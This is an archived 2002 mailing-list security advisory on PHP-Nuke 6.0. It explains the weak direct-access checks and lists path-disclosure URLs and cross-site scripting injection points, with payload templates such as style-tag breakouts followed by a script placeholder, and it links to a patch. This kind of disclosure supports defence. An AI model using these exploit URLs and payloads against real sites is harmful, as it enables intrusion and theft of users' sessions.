PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

• Previous message: Daniel Ahlberg: "GLSA: exim"
• Next in thread: Ing. Bernardo Lopez: "PHPNuke 6.0 path disclosure [again]"
• Reply: Ing. Bernardo Lopez: "PHPNuke 6.0 path disclosure [again]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
°°°°°°°°°°°°°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS


Developpement :
°°°°°°°°°°°°°°°
The majority of the PHPNuke's files are includes in modules.php or 
index.php.  To prevent the direct access, PHPNuke made two kinds of safety.
The first one (e.g. in modules/Downloads/index.php) is :
---------------------------------------------------
if (!eregi("modules.php", $PHP_SELF)) {
    die ("You can't access this file directly...");
}
---------------------------------------------------

The second one (e.g. footer.php ) :
------------------------------------
if (eregi("footer.php",$PHP_SELF)) {
    Header("Location: index.php");
    die();
}
------------------------------------

Some files haven't these safety measures but they have security holes.

Exploits :
°°°°°°°°°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or 
http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver

- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

- /modules/Forums/editpost.php, /modules/Forums/newtopic.php, 
/modules/Forums/reply.php, /modules/Forums/topicadmin.php, 
/modules/Forums/viewforum.php with :
$name

- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org .


More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n



_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp

• Next message: OpenPKG: "[OpenPKG-SA-2002.015] OpenPKG Security Advisory (tetex)"
• Previous message: Daniel Ahlberg: "GLSA: exim"
• Next in thread: Ing. Bernardo Lopez: "PHPNuke 6.0 path disclosure [again]"
• Reply: Ing. Bernardo Lopez: "PHPNuke 6.0 path disclosure [again]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 18:05:08 PST